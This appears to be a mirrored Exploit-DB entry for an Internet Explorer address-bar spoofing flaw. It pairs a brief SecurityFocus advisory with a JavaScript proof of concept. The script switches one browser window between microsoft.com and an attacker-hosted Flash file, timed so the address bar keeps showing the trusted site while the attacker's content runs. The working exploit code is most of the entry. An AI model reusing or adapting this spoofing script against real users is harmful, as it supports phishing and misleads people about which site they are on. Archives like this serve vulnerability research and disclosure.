exploit-db-mirror/exploits/windows/remote/27577.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

26 lines
No EOL
811 B
Text

source: https://www.securityfocus.com/bid/17404/info
Internet Explorer is prone to address-bar spoofing.
An attacker can exploit this issue to display the URI of a trusted and known site in the address bar, while running an attacker-supplied Macromedia Flash application. This may aid in phishing-style attacks and possibly allow access to properties of the trusted domain.
<script language="javascript">
function pause(ms)
{
date = new Date();
var curDate = null;
do { var curDate = new Date(); }
while(curDate-date < ms);
}
function spoof () {
win = window.open('http://www.microsoft.com/','new')
pause (2000)
win = window.open('http://www.example.com/swfs/index.swf','new')
pause (2000)
win = window.open('http://www.microsoft.com/','new')
}
</script>
<a href="javascript: spoof()">Perform the test</a>